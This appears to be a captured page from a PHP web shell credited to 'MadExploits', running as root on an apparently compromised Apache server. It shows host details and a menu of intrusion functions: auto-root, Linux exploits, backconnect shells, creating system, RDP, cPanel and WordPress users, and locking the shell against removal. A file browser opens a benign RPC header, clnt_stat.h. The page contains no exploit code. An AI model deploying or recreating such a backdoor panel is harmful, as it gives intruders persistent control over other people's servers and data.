Linux e000727e84fa 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64
Apache/2.4.62 (Debian)
: 192.168.16.2 | : 192.168.16.1
Cant Read [ /etc/named.conf ]
8.2.27
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
tirpc /
rpc /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.h
10.83
KB
-rw-r--r--
auth_des.h
3.65
KB
-rw-r--r--
auth_gss.h
4.19
KB
-rw-r--r--
auth_unix.h
2.94
KB
-rw-r--r--
clnt.h
16.67
KB
-rw-r--r--
clnt_soc.h
3.81
KB
-rw-r--r--
clnt_stat.h
2.15
KB
-rw-r--r--
des.h
2.97
KB
-rw-r--r--
des_crypt.h
3.62
KB
-rw-r--r--
key_prot.h
8.19
KB
-rw-r--r--
nettype.h
2.37
KB
-rw-r--r--
pmap_clnt.h
3.5
KB
-rw-r--r--
pmap_prot.h
4
KB
-rw-r--r--
pmap_rmt.h
2.39
KB
-rw-r--r--
raw.h
2.07
KB
-rw-r--r--
rpc.h
4.03
KB
-rw-r--r--
rpc_com.h
3.03
KB
-rw-r--r--
rpc_msg.h
5.21
KB
-rw-r--r--
rpcb_clnt.h
3.41
KB
-rw-r--r--
rpcb_prot.h
25.17
KB
-rw-r--r--
rpcb_prot.x
14.33
KB
-rw-r--r--
rpcent.h
2.65
KB
-rw-r--r--
rpcsec_gss.h
4.05
KB
-rw-r--r--
svc.h
14.25
KB
-rw-r--r--
svc_auth.h
2.97
KB
-rw-r--r--
svc_auth_gss.h
1.9
KB
-rw-r--r--
svc_dg.h
2.4
KB
-rw-r--r--
svc_mt.h
1.87
KB
-rw-r--r--
svc_soc.h
3.66
KB
-rw-r--r--
types.h
3.75
KB
-rw-r--r--
xdr.h
13.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clnt_stat.h
/* $FreeBSD: src/include/rpc/clnt_stat.h,v 1.2 2001/03/20 08:20:50 alfred Exp $ */ /* * Copyright (c) 1986 - 1991, 1994, 1996, 1997 by Sun Microsystems, Inc. * All rights reserved. */ /* * clnt_stat.h - Client side remote procedure call enum * */ #ifndef _RPC_CLNT_STAT_H #define _RPC_CLNT_STAT_H /* #pragma ident "@(#)clnt_stat.h 1.2 97/04/28 SMI" */ #ifdef __cplusplus extern "C" { #endif enum clnt_stat { RPC_SUCCESS = 0, /* call succeeded */ /* * local errors */ RPC_CANTENCODEARGS = 1, /* can't encode arguments */ RPC_CANTDECODERES = 2, /* can't decode results */ RPC_CANTSEND = 3, /* failure in sending call */ RPC_CANTRECV = 4, /* failure in receiving result */ RPC_TIMEDOUT = 5, /* call timed out */ RPC_INTR = 18, /* call interrupted */ RPC_UDERROR = 23, /* recv got uderr indication */ /* * remote errors */ RPC_VERSMISMATCH = 6, /* rpc versions not compatible */ RPC_AUTHERROR = 7, /* authentication error */ RPC_PROGUNAVAIL = 8, /* program not available */ RPC_PROGVERSMISMATCH = 9, /* program version mismatched */ RPC_PROCUNAVAIL = 10, /* procedure unavailable */ RPC_CANTDECODEARGS = 11, /* decode arguments error */ RPC_SYSTEMERROR = 12, /* generic "other problem" */ /* * rpc_call & clnt_create errors */ RPC_UNKNOWNHOST = 13, /* unknown host name */ RPC_UNKNOWNPROTO = 17, /* unknown protocol */ RPC_UNKNOWNADDR = 19, /* Remote address unknown */ RPC_NOBROADCAST = 21, /* Broadcasting not supported */ /* * rpcbind errors */ RPC_RPCBFAILURE = 14, /* the pmapper failed in its call */ #define RPC_PMAPFAILURE RPC_RPCBFAILURE RPC_PROGNOTREGISTERED = 15, /* remote program is not registered */ RPC_N2AXLATEFAILURE = 22, /* Name to address translation failed */ /* * Misc error in the TLI library */ RPC_TLIERROR = 20, /* * unspecified error */ RPC_FAILED = 16, /* * asynchronous errors */ RPC_INPROGRESS = 24, RPC_STALERACHANDLE = 25, RPC_CANTCONNECT = 26, /* couldn't make connection (cots) */ RPC_XPRTFAILED = 27, /* received discon from remote (cots) */ RPC_CANTCREATESTREAM = 28 /* can't push rpc module (cots) */ }; #ifdef __cplusplus } #endif #endif /* !_RPC_CLNT_STAT_H */
Close